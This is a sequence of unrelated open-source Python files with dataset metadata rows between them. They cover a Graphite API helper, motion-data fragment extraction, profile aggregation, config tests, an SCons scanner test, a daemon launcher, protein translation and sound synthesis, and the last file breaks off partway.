* 404 - Given ID did not match any documents
"""
doc = DB.get_connection(id)
if not doc:
return json({'error': True}, 404)
else:
doc['contributions'] = DB.get_contributions(doc['agent_data']['id'])
return json(doc)
### Utilities ###
def mk_graphite_request(path, start, end):
global HTTP
query = {'target': path, 'format': 'json', '_salt': str(random())[2:]}  # random numeric salt
if start:
query['from'] = start
if end:
query['until'] = end
url = "http://%s:%s/render/?%s" % (SETTINGS['GRAPHITE_HOST'], SETTINGS['GRAPHITE_PORT'], urlencode(query))
headers, content = HTTP.request(url, "GET")
return content
class EnhancedJSONEncoder(DjangoJSONEncoder):
"""
Custom JSON encoder which can serialize MongoDB's ObjectId objects.
"""
def default(self, o, **kwargs):
if isinstance(o, ObjectId):
return str(o)
else:
return DjangoJSONEncoder.default(self, o, **kwargs)
def json(data, status=200):
data = simplejson.dumps(data, cls=EnhancedJSONEncoder, separators=(',', ':'))
return HttpResponse(data, mimetype='application/json', status=status)
| bsd-3-clause | 345,892,791,650,336,500 | 25.856061 | 108 | 0.667137 | false |
petr-devaikin/dancee | helpers/extractor.py | 1 | 5790 |
# Cut the experiment session in small fragments
# Input: ../bin/data/records/{session}/body.csv and skeleton.csv
# Output: fragments/{fragment_number}.json and fragments/log.csv
import os
import numpy
import json
DELAY = 15
LENGTH = 30
OVERLAP = 0.719999
FREQUENCY = 60
MARGIN = 5
FREQUENCY = 60
CUTOFF_FREQUENCY = 10
buf_length = FREQUENCY / CUTOFF_FREQUENCY
kernel = numpy.blackman(buf_length)
kernel_summ = numpy.sum(kernel)
to_filter = [
9, 10, 11, #r_shoulder
12, 13, 14, #r_elbow
15, 16, 17, #r_hand
18, 19, 20, #l_shoulder
21, 22, 23, #l_elbow
24, 25, 26, #l_hand
27, 28, 29, #r_hip
30, 31, 32, #r_knee
36, 37, 38, #r_foot
39, 40, 41, #l_hip
42, 43, 44, #l_knee
48, 49, 50 #l_foot
]
buffers = [[0] * buf_length] * len(to_filter)
values = [0] * len(to_filter)
values2 = [0] * len(to_filter)
# emg filtering
CUTOFF_EMG_FREQUENCY = 6
buf_emg_length = FREQUENCY / CUTOFF_EMG_FREQUENCY
kernel_emg = numpy.blackman(buf_emg_length)
kernel_emg_summ = numpy.sum(kernel_emg)
emg2_buffer = [0] * buf_emg_length
# acc filtering
CUTOFF_ACC_FREQUENCY = 10
buf_acc_length = FREQUENCY / CUTOFF_ACC_FREQUENCY
kernel_acc = numpy.blackman(buf_acc_length)
kernel_acc_summ = numpy.sum(kernel_acc)
acc_buffer = [[0] * buf_acc_length] * 3
# clean the folder
for f in os.listdir("fragments"):
os.remove(os.path.join('fragments', f))
# cut fragments
record_counter = 0
def cut_fragment(participant, track_number):
global record_counter
global values
global values2
global buffers
global emg2_buffer
global acc_buffer
print "Cut participant " + participant + ", track " + str(track_number)
result_data = {
'acc1': [],
'acc2': [],
'acc2_nf': [],
'emg1': [],
'emg2': [],
'emg2_nf': [],
'skeleton': [],
'skeleton_nf': [],
}
path = "../bin/data/records/"
for rec in os.listdir(path):
if rec.split(' ')[0] == participant:
with open(path + rec + "/body.csv", 'r') as f_read_body:
with open(path + rec + "/skeleton.csv", 'r') as f_read_skeleton:
i = 0
while i < (DELAY + (OVERLAP + LENGTH) * (track_number + 1) - MARGIN) * FREQUENCY:
line_body = f_read_body.readline().strip().split('\t')
line_skeleton = f_read_skeleton.readline().strip().split('\t')
values3 = [0] * len(to_filter)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number) * FREQUENCY:
values = [float(line_skeleton[j]) for j in to_filter]
for j in range(2, len(values), 3):
if values[j] > 1.4:
values2[j - 2] = values[j - 2]
values2[j - 1] = values[j - 1]
values2[j] = values[j]
for j in range(len(values)):
buffers[j].append(values2[j])
buffers[j] = buffers[j][1:]
for k in range(buf_length):
values3[j] += buffers[j][k] * kernel[k]
values3[j] /= kernel_summ
#emg filtering
emg2 = float(line_body[7])
emg2_nf = emg2
emg2_buffer.append(emg2)
emg2_buffer = emg2_buffer[1:]
emg2 = 0
for k in range(buf_emg_length):
emg2 += emg2_buffer[k] * kernel_emg[k]
emg2 /= kernel_emg_summ
line_body[7] = str(emg2)
#acc filtering
acc_values = [float(v) for v in line_body[3:6]]
for j in range(3):
v = float(line_body[3 + j])
acc_buffer[j].append(v)
acc_buffer[j] = acc_buffer[j][1:]
v2 = 0
for k in range(buf_acc_length):
v2 += acc_buffer[j][k] * kernel_acc[k]
v2 /= kernel_acc_summ
line_body[j + 3] = str(v2)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number + MARGIN) * FREQUENCY:
result_data['acc1'].append([float(v) - 512 for v in line_body[0:3]])
result_data['acc2'].append([float(v) - 512 for v in line_body[3:6]])
result_data['acc2_nf'].append(acc_values)
result_data['emg1'].append(float(line_body[6]))
result_data['emg2'].append(float(line_body[7]))
result_data['emg2_nf'].append(emg2_nf)
result_data['skeleton'].append({
'r_shoulder': values3[0:3],
'r_elbow': values3[3:6],
'r_hand': values3[6:9],
'l_shoulder': values3[9:12],
'l_elbow': values3[12:15],
'l_hand': values3[15:18],
'r_hip': values3[18:21],
'r_knee': values3[21:24],
'r_foot': values3[24:27],
'l_hip': values3[27:30],
'l_knee': values3[30:33],
'l_foot': values3[33:36]
})
result_data['skeleton_nf'].append({
'r_shoulder': values[0:3],
'r_elbow': values[3:6],
'r_hand': values[6:9],
'l_shoulder': values[9:12],
'l_elbow': values[12:15],
'l_hand': values[15:18],
'r_hip': values[18:21],
'r_knee': values[21:24],
'r_foot': values[24:27],
'l_hip': values[27:30],
'l_knee': values[30:33],
'l_foot': values[33:36]
})
i += 1
with open('fragments/' + str(record_counter) + '.json', "w") as f_write:
json.dump(result_data, f_write)
break
else:
print "Cannot find data for participant ", participant, "\n"
return None
record_counter += 1
return record_counter - 1
with open('selftest/results.txt', 'r') as f:
with open('fragments/log.csv', 'w') as log:
log.write('Participant\tTrack number\tTrack order\tValence\tArousal\tFragment\n')
participant = -1
track_number = 0
for line in f:
ar = line.strip().split(' ');
if ar[0] != participant:
track_number = 0
participant = ar[0]
track_real_number = ar[1]
valence = ar[2]
arousal = ar[3]
record = cut_fragment(participant, track_number)
log.write(participant + '\t' + track_real_number + '\t' + str(track_number) + '\t' + valence + '\t' + arousal + '\t' + str(record) + '\n')
track_number += 1
#break
| gpl-3.0 | -8,201,075,262,819,803,000 | 25.199095 | 141 | 0.580656 | false |
quantumgraph/qgprofiler | qgprofiler/qg_profile_aggregator.py | 1 | 4240 |
from node import Node, NodeList
from .qg_profiler import QGProfiler
from .helper import get_real_file_path, get_file_type, xml_scanner, read_attributes_from_xml, merge_attributes
import glob
import json
class QGProfileAggregator(object):
def __init__(self, in_file_path, out_file_path):
self.root_node = Node('i_am_root', None, {})
self.in_file_path = get_real_file_path(in_file_path)
get_file_type(out_file_path)
self.out_file_path = get_real_file_path(out_file_path)
def add_json(self, _json):
new_node = self.make_node_from_json(_json, self.root_node)
new_node_list = NodeList()
new_node_list.append(new_node)
self.merge_node_list_to_node(self.root_node, new_node_list)
def merge_node_list_to_node(self, main_node, node_list):
for node in node_list:
index = main_node.is_child_in_children(node.get_name())
if index == -1:
main_node.add_child(node)
else:
existing_node = main_node.get_child(index)
existing_node.increment_value_by(node.get_value())
existing_node.increment_count_by(node.get_count())
existing_node.set_aggregate_attr(merge_attributes(node.get_aggregate_attr(), existing_node.get_aggregate_attr()))
existing_node.update_over_head(node.get_over_head())
self.merge_node_list_to_node(existing_node, node.get_children())
def make_node_from_json(self, _json, parent_node):
name = _json['name']
value = _json['value']
count = _json['count']
children = _json['children']
attributes = _json.get('attributes', {})
over_head = _json.get('overhead', 0)
new_node = Node(name, parent_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
for child in children:
child_node = self.make_node_from_json(child, new_node)
new_node.add_child(child_node)
return new_node
def add_xml(self, _xml):
current_node = self.root_node
xml_gen = xml_scanner(_xml)
for each in xml_gen:
if each[0] == 'START':
name = str(each[2]['name'])
value = float(each[2]['value'])
count = int(each[2]['count'])
over_head = float(each[2].get('overhead', 0))
attributes = read_attributes_from_xml(each[2].get('attributes', {}))
index = current_node.is_child_in_children(name)
if index == -1:
new_node = Node(name, current_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
current_node.add_child(new_node)
current_node = new_node
else:
current_node = current_node.get_child(index)
current_node.increment_value_by(value)
current_node.increment_count_by(count)
current_node.set_aggregate_attr(merge_attributes(attributes, current_node.get_aggregate_attr()))
current_node.update_over_head(over_head)
elif each[0] == 'END':
current_node = current_node.get_parent()
def generate_file(self, rounding_no=6):
for file_path in glob.iglob(self.in_file_path):
filename = file_path.split('/')[-1]
if filename.endswith('.json'):
with open(file_path, 'r') as f:
raw_json = f.read()
_json = json.loads(raw_json)
self.add_json(_json)
elif filename.endswith('.xml'):
with open(file_path, 'r') as f:
_xml = f.read()
self.add_xml(_xml)
qg_profiler = QGProfiler('test', self.out_file_path)
if len(self.root_node.get_children()) == 1:
qg_profiler.root_node = self.root_node.get_child(0)
else:
qg_profiler.root_node = self.root_node
qg_profiler.generate_file(rounding_no)
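# Illustrative usage sketch (assumed paths; the output extension must be one the
# underlying QGProfiler accepts):
#   QGProfileAggregator('/tmp/profiles/*.xml', '/tmp/aggregate.json').generate_file()
# would merge every matching .xml/.json profile under the glob into one output tree.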
| mit | 7,139,093,304,680,659,000 | 43.631579 | 129 | 0.556132 | false |
henriquebastos/django-decouple | tests/test_env.py | 1 | 1790 |
# coding: utf-8
import os
import sys
from mock import patch
import pytest
from decouple import Config, RepositoryEnv, UndefinedValueError
# Useful for very coarse version differentiation.
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
else:
from StringIO import StringIO
ENVFILE = '''
KeyTrue=True
KeyOne=1
KeyYes=yes
KeyOn=on
KeyFalse=False
KeyZero=0
KeyNo=no
KeyOff=off
#CommentedKey=None
PercentNotEscaped=%%
NoInterpolation=%(KeyOff)s
'''
@pytest.fixture(scope='module')
def config():
with patch('decouple.open', return_value=StringIO(ENVFILE), create=True):
return Config(RepositoryEnv('.env'))
def test_env_comment(config):
with pytest.raises(UndefinedValueError):
config('CommentedKey')
def test_env_percent_not_escaped(config):
assert '%%' == config('PercentNotEscaped')
def test_env_no_interpolation(config):
assert '%(KeyOff)s' == config('NoInterpolation')
def test_env_bool_true(config):
assert True == config('KeyTrue', cast=bool)
assert True == config('KeyOne', cast=bool)
assert True == config('KeyYes', cast=bool)
assert True == config('KeyOn', cast=bool)
def test_env_bool_false(config):
assert False == config('KeyFalse', cast=bool)
assert False == config('KeyZero', cast=bool)
assert False == config('KeyNo', cast=bool)
assert False == config('KeyOff', cast=bool)
def test_env_os_environ(config):
os.environ['KeyFallback'] = 'On'
assert True == config('KeyTrue', cast=bool)
assert True == config('KeyFallback', cast=bool)
del os.environ['KeyFallback']
def test_env_undefined(config):
with pytest.raises(UndefinedValueError):
config('UndefinedKey')
def test_env_default_none(config):
assert None is config('UndefinedKey', default=None)
| mit | 7,651,317,815,058,912,000 | 23.520548 | 77 | 0.703911 | false |
macmanes-lab/MCBS913 | code/Junhong Chen/generateProtineSeq.py | 1 | 4902 |
"""
Author: Junhong Chen
"""
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio import SeqIO
from sys import argv
import os
path = argv[1]
class CDS:
def __init__(self,gff):
self.data = dict()
self.fname = gff
def parse(self):
file = open(self.fname,"r")
for elem in file:
if "CDS" in elem:
tmp = elem.split()
ind = tmp.index("CDS")
if tmp[0] in self.data:
self.data[tmp[0]].append((int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4]))
else:
self.data[tmp[0]] = [(int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4])]
def getContigName(self):
return self.data.keys()
def getContigNumber(self):
return len(self.data)
def getContigCDSIndex(self,name):
if name in self.data:
return self.data[name]
else:
print "No indices for that contig ID: ", name
#return self.data[name.split(".")[0]]
def getContigCDSSize(self,name):
return len(self.getContigCDSIndex(name))
class RefSeq:
def __init__(self,fast):
self.fname = fast
self.data = dict()
self.result = dict()
self.cds = CDS(fast.split(".")[0]+".gff")
def parse(self):
fast = SeqIO.parse(open(self.fname),"fasta")
for elem in fast:
tmp = elem.id.split("|")[3]
if tmp in self.data:
print "ATTENTION: same contig ID in: " + self.fname
else:
self.data[tmp] = str(elem.seq)
def getContigSeq(self,name):
if name in self.data:
return self.data[name]
else:
print "Can NOT find the contig: "+name
def getContigData(self):
return self.data
def getContigID(self):
return self.data.keys()
def getContigCDSSize(self,name):
return self.cds.getContigCDSSize(name)
def translate(self,mode = IUPAC.ambiguous_dna):
self.cds.parse()
contig = self.data.keys()
for name in contig:
ind = self.cds.getContigCDSIndex(name)
sq = self.data[name]
ret = []
for tup in ind:
myseq = sq[tup[0]-1:tup[1]]
#store Seq Object
if tup[2] == "+":
ret.append(Seq(myseq, mode).translate())
else:
ret.append(Seq(myseq, mode).reverse_complement().translate())
self.result[name] = ret
return self.result
def getCDSSeq(self,name,index):
sq = self.data[name]
ind = self.cds.getContigCDSIndex(name)[index]
print self.cds.getContigName();
return sq[ind[0]-1:ind[1]]
def compareProtineSeq(path):
refd = RefSeq(path+".fastd")
refd.parse()
refa = RefSeq(path+".fasta")
refa.parse()
refat = refa.translate()
refdt = refd.translate()
#print refat["NC_008752.1"][3]
#print refdt["NC_008752.1"][3]
#print refa.getCDSSeq("NC_008752.1",3)
#print refd.getCDSSeq("NC_008752.1",3)
id = refd.getContigID()
ret = dict()
for name in id:
mis = []
l = refa.getContigCDSSize(name)
stat = 0
for i in range(l):
if refat[name][i] in refdt[name][i]:
stat = stat + 1
else:
mis.append(i)
ret[name] = (l,stat,mis)
def sum(x):
ret = 0.
for el in x:
ret = ret + el*1.
return ret
mis = [x[1] for x in ret.values()]
tot = [x[0] for x in ret.values()]
return sum(mis)/sum(tot)
#return ret
def getFilesinCWD(path):
if path[-1] is not "/":
path = path + "/"
ref = []
files = [f for f in os.listdir(path)]
for i in range(1,5):
for fo in files:
f = fo.split(".")[0]
if f not in ref and f.startswith(str(i)+"-"):
ref.append(f)
ret = [path+tp for tp in ref]
return ret
def doCompare(path):
fpath = getFilesinCWD(path)
retp = [f.split("/")[-1] for f in fpath]
ret = []
for p in fpath:
ret.append(compareProtineSeq(p))
return retp,ret
if __name__ == "__main__":
print doCompare(path)
##refa = RefSeq(path+".fasta")
#refa.parse()
#print refa.getCDSSeq("NC_008752",0)
| mit | -7,779,518,581,467,217,000 | 20.5 | 90 | 0.467768 | false |
EmanueleCannizzaro/scons | test/Scanner/Scanner.py | 1 | 7353 |
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Scanner/Scanner.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('build.py', r"""
import sys
input = open(sys.argv[1], 'rb')
output = open(sys.argv[2], 'wb')
def process(infp, outfp):
for line in infp.readlines():
if line[:8] == 'include ':
file = line[8:-1]
process(open(file, 'rb'), outfp)
elif line[:8] == 'getfile ':
outfp.write('include ')
outfp.write(line[8:])
# note: converted, but not acted upon
else:
outfp.write(line)
process(input, output)
sys.exit(0)
""")
# Execute a subsidiary SConscript just to make sure we can
# get at the Scanner keyword from there.
test.write('SConstruct', """
SConscript('SConscript')
""")
test.write('SConscript', """
import re
include_re = re.compile(r'^include\s+(\S+)$', re.M)
def kfile_scan(node, env, scanpaths, arg):
contents = node.get_text_contents()
includes = include_re.findall(contents)
return includes
kscan = Scanner(name = 'kfile',
function = kfile_scan,
argument = None,
skeys = ['.k'])
env = Environment(K2SCAN=kfile_scan)
k2scan = env.Scanner(name = 'k2',
# We'd like to do the following, but it will take
# some major surgery to subst() and subst_list(),
# so comment it out for now.
# function = '$K2SCAN',
function = kfile_scan,
argument = None,
skeys = ['.k2'])
##########################################################
# Test scanner as found automatically from the environment
# (backup_source_scanner)
env = Environment()
env.Append(SCANNERS = kscan)
env.Command('foo', 'foo.k', r'%(_python_)s build.py $SOURCES $TARGET')
##########################################################
# Test resetting the environment scanners (and specifying as a list).
env2 = env.Clone()
env2.Append(SCANNERS = [k2scan])
env2.Command('junk', 'junk.k2', r'%(_python_)s build.py $SOURCES $TARGET')
##########################################################
# Test specifying a specific source scanner for a target Node
barbld = Builder(action=r'%(_python_)s build.py $SOURCES $TARGET',
source_scanner=kscan)
env.Append(BUILDERS={'BarBld':barbld})
bar = env.BarBld(target='bar', source='bar.in')
##########################################################
# Test specifying a source scanner for a Builder that gets
# automatically applied to targets generated from that Builder
def blork(env, target, source):
open(str(target[0]), 'wb').write(
source[0].get_text_contents().replace('getfile', 'MISSEDME'))
kbld = Builder(action=r'%(_python_)s build.py $SOURCES $TARGET',
src_suffix='.lork',
suffix='.blork',
source_scanner=kscan)
blorkbld = Builder(action=blork,
src_suffix='.blork',
suffix='.ork')
env.Append(BUILDERS={'BLORK':blorkbld, 'KB':kbld})
blork = env.KB('moo.lork')
ork = env.BLORK(blork)
Alias('make_ork', ork)
""" % locals())
test.write('foo.k',
"""foo.k 1 line 1
include xxx
include yyy
foo.k 1 line 4
""")
test.write('bar.in',
"""include yyy
bar.in 1 line 2
bar.in 1 line 3
include zzz
""")
test.write('junk.k2',
"""include yyy
junk.k2 1 line 2
junk.k2 1 line 3
include zzz
""")
test.write('moo.lork',
"""include xxx
moo.lork 1 line 2
include yyy
moo.lork 1 line 4
include moo.inc
""")
test.write('moo.inc',
"""getfile zzz
""")
test.write('xxx', "xxx 1\n")
test.write('yyy', "yyy 1\n")
test.write('zzz', "zzz 1\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py foo.k foo
%(_python_)s build.py junk.k2 junk
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 1\nyyy 1\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 1\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 1\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 1\nmoo.lork 1 line 2\nyyy 1\nmoo.lork 1 line 4\ninclude zzz\n")
test.up_to_date(arguments = '.')
test.write('xxx', "xxx 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py foo.k foo
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 1\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 1\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 1\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 1\nmoo.lork 1 line 4\ninclude zzz\n")
test.write('yyy', "yyy 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py foo.k foo
%(_python_)s build.py junk.k2 junk
%(_python_)s build.py moo.lork moo.blork
blork(["moo.ork"], ["moo.blork"])
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 2\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 2\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 1\n")
test.must_match('junk', "yyy 2\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 1\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 2\nmoo.lork 1 line 4\ninclude zzz\n")
test.write('zzz', "zzz 2\n")
expect = test.wrap_stdout("""\
%(_python_)s build.py bar.in bar
%(_python_)s build.py junk.k2 junk
""" % locals())
test.run(arguments = '.', stdout=expect)
test.must_match('foo', "foo.k 1 line 1\nxxx 2\nyyy 2\nfoo.k 1 line 4\n")
test.must_match('bar', "yyy 2\nbar.in 1 line 2\nbar.in 1 line 3\nzzz 2\n")
test.must_match('junk', "yyy 2\njunk.k2 1 line 2\njunk.k2 1 line 3\nzzz 2\n")
test.must_match('moo.ork', "xxx 2\nmoo.lork 1 line 2\nyyy 2\nmoo.lork 1 line 4\ninclude zzz\n")
test.up_to_date(arguments = 'foo')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -8,465,427,710,876,790,000 | 29.135246 | 97 | 0.629131 | false |
openre/openre | openre/agent/domain/__init__.py | 1 | 1623 |
# -*- coding: utf-8 -*-
"""
Domain. Creates one process for one openre domain. Receives and forwards
spikes (pub), receives commands from the server (req-rep) and relays the
result of the command execution.
"""
from openre.agent.decorators import daemonize
from openre.agent.helpers import daemon_stop
import logging
import signal
from openre.agent.args import parse_args
from openre.agent.domain.args import parser
from openre.agent.domain.domain import Agent
def run():
args = parse_args(parser)
def sigterm(signum, frame):
signum_to_str = dict(
(k, v) for v, k in reversed(sorted(signal.__dict__.items()))
if v.startswith('SIG') and not v.startswith('SIG_')
)
logging.debug(
'Got signal.%s. Clean and exit.',
signum_to_str.get(signum, signum)
)
exit(0)
@daemonize(
args.pid_file,
signal_map={
signal.SIGTERM: sigterm,
signal.SIGINT: sigterm,
},
)
def start():
"""
Start the server
"""
logging.info('Start OpenRE.Agent domain')
agent = Agent(vars(args))
agent.run()
def stop():
"""
Stop the server
"""
logging.info('Stop OpenRE.Agent domain')
daemon_stop(args.pid_file)
if args.action == 'start':
start()
elif args.action == 'stop':
stop()
elif args.action == 'restart':
stop()
start()
| mit | -6,384,374,142,818,930,000 | 24.413793 | 74 | 0.580054 | false |
ttm/pingosom | pingosom2.py | 1 | 50613 |
#-*- coding: utf-8 -*-
import numpy as n, random, os, sys, time
from scipy.io import wavfile as w
tfoo=time.time()
H=n.hstack
V=n.vstack
f_a = 44100. # Hz, sampling frequency
############## 2.2.1 Lookup table (LUT)
Lambda_tilde=Lt=1024.*16
# Sine
fooXY=n.linspace(0,2*n.pi,Lt,endpoint=False)
S_i=n.sin(fooXY) # one period of the sine, Lt samples long
# Square:
Q_i=n.hstack( ( n.ones(Lt/2)*-1 , n.ones(Lt/2) ) )
# Triangle:
foo=n.linspace(-1,1,Lt/2,endpoint=False)
Tr_i=n.hstack( ( foo , foo*-1 ) )
# Sawtooth:
D_i=n.linspace(-1,1,Lt)
def v(f=220,d=2.,tab=S_i,fv=2.,nu=2.,tabv=S_i):
if nu==13.789987:
return n.zeros(int(f_a*d))
Lambda=n.floor(f_a*d)
ii=n.arange(Lambda)
Lv=float(len(tabv))
Gammav_i=n.floor((ii*fv*Lv)/f_a) # indices into the LUT
Gammav_i=n.array(Gammav_i,n.int)
# vibrato variation pattern for each sample
Tv_i=tabv[Gammav_i%int(Lv)]
# frequency in Hz at each sample
F_i=f*( 2.**( Tv_i*nu/12. ) )
# table increment per sample
D_gamma_i=F_i*(Lt/float(f_a))
Gamma_i=n.cumsum(D_gamma_i) # total displacement along the table
Gamma_i=n.floor( Gamma_i) # now the indices
Gamma_i=n.array( Gamma_i, dtype=n.int) # as integer indices
return tab[Gamma_i%int(Lt)] # look the indices up in the table
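# Example (illustrative): v(f=440., d=1.5, tab=Tr_i, fv=6., nu=0.5) renders 1.5 s of a
# 440 Hz triangle wave with a 6 Hz vibrato whose depth is half a semitone.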
def A(fa=2.,V_dB=10.,d=2.,taba=S_i):
    # Use as: v(d=XXX)*A(d=XXX)
    Lambda=n.floor(f_a*d)
    ii=n.arange(Lambda)
    Lt=float(len(taba))
    Gammaa_i=n.floor(ii*fa*Lt/f_a) # indices into the LUT
    Gammaa_i=n.array(Gammaa_i,n.int)
    # amplitude variation at each sample
    A_i=taba[Gammaa_i%int(Lt)]
    A_i=1+A_i*(1- 10.**(V_dB/20.))
    return A_i
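# Illustrative example (added): a 3 Hz tremolo with 6 dB of depth applied to a
# plain two-second 330 Hz tone, following the usage noted above
# (v(d=XXX)*A(d=XXX)); the variable name is only for demonstration.
exemplo_tremolo = v(f=330., d=2., nu=0.) * A(fa=3., V_dB=6., d=2.)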
def adsr(som,A=10.,D=20.,S=-20.,R=100.,xi=1e-2):
"""Envelope ADSR com
A ataque em milissegundos,
D decay em milissegundos
S sustain, com número de decibéis a menos
R Release em milisegundos
Atenção para que a duração total é dada pelo som em si
e que a duração do trecho em sustain é a diferença
entre a duração total e as durações das partes ADR."""
a_S=10**(S/20.)
Lambda=len(som)
Lambda_A=int(A*f_a*0.001)
Lambda_D=int(D*f_a*0.001)
Lambda_R=int(R*f_a*0.001)
Lambda_S=Lambda - Lambda_A - Lambda_D - Lambda_R
ii=n.arange(Lambda_A,dtype=n.float)
A=ii/(Lambda_A-1)
A_i=A # ok
ii=n.arange(Lambda_A,Lambda_D+Lambda_A,dtype=n.float)
D=1-(1-a_S)*( ( ii-Lambda_A )/( Lambda_D-1) )
A_i=n.hstack( (A_i, D ) )
S=n.ones(Lambda-Lambda_R-(Lambda_A+Lambda_D),dtype=n.float)*a_S
A_i=n.hstack( ( A_i, S ) )
ii=n.arange(Lambda-Lambda_R,Lambda,dtype=n.float)
R=a_S-a_S*((ii-(Lambda-Lambda_R))/(Lambda_R-1))
A_i=n.hstack( (A_i,R) )
return som*A_i
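# Illustrative example (added): the ADSR envelope applied to a plain one-second
# 220 Hz tone: 10 ms attack, 50 ms decay, sustain 10 dB down, 300 ms release.
exemplo_adsr = adsr(v(f=220., d=1., nu=0.), A=10., D=50., S=-10., R=300.)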
triadeM=[0.,4.,7.]
def ac(f=220.,notas=[0.,4.,7.,12.],tab=Q_i,d=2.,nu=0,fv=2.):
acorde=adsr(v(tab=tab,d=d,f=f*2.**(notas[-1]/12.),nu=nu,fv=fv))
for na in notas[:-1]:
acorde+=adsr(v(tab=tab,d=d,f=f*2**(na/12.),nu=nu,fv=fv))
return acorde*10
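# Illustrative example (added): a one-second major triad on 220 Hz built from
# the triadeM intervals with the triangle table; the name is only for
# demonstration.
exemplo_acorde = ac(f=220., notas=triadeM, tab=Tr_i, d=1.)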
def N(arr,xx=1.):
r=arr
r = (((r-r.min())/(r.max()-r.min()))*2-1)*xx
return n.int16(r * float(2**15-1))
def NN(arr):
return 2*((arr-arr.min())/(arr.max()-arr.min()))-1
vozes="f3,f2,f1,f5,m5,m1,m3".split(",")
def fala(frase="Semicondutor livre",ss=160):
arq=frase.split()[0]
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s110 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
os.system(u"espeak -vpt-pt+%s -w%s.wav -p99 -b=1 '%s' -s%i"%(random.sample(vozes,1)[0],arq,frase,ss))
#os.system(u"espeak "+ frase +(u" -vpt-pt+%s -w%s.wav -p99 -b=1 -s%i"%(random.sample(vozes,1)[0],arq,ss)))
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s130 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
ff=w.read("%s.wav"%(arq,))[1]
ff_=n.fft.fft(ff)
s=ff2=n.fft.ifft( n.hstack((ff_,n.zeros(len(ff_)) )) ).real
sc_aud=((s-s.min())/(s.max()-s.min()))*2.-1.
return sc_aud*10
####
# noises
Lambda = 100000 # Lambda always even
# frequency difference between neighboring coefficients:
df = f_a/float(Lambda)
coefs = n.exp(1j*n.random.uniform(0, 2*n.pi, Lambda))
# real part even, imaginary part odd
coefs[Lambda/2+1:] = n.real(coefs[1:Lambda/2])[::-1] - 1j * \
n.imag(coefs[1:Lambda/2])[::-1]
coefs[0] = 0. # no bias (DC)
coefs[Lambda/2] = 1. # the max frequency is simply real
# the frequencies corresponding to each coefficient
# (not valid above Lambda/2)
fi = n.arange(coefs.shape[0])*df
f0 = 15. # we start the noise at 15 Hz
i0 = n.floor(f0/df) # first coefficient that counts
coefs[:i0] = n.zeros(i0)
f0 = fi[i0]
# obtain the noise as time-domain samples
ruido = n.fft.ifft(coefs)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rb=r
r = n.int16(r * float(2**15-1))
w.write('branco.wav', f_a, r)
fator = 10.**(-6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real part even, imaginary part odd
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# generating time-domain samples of the brown noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
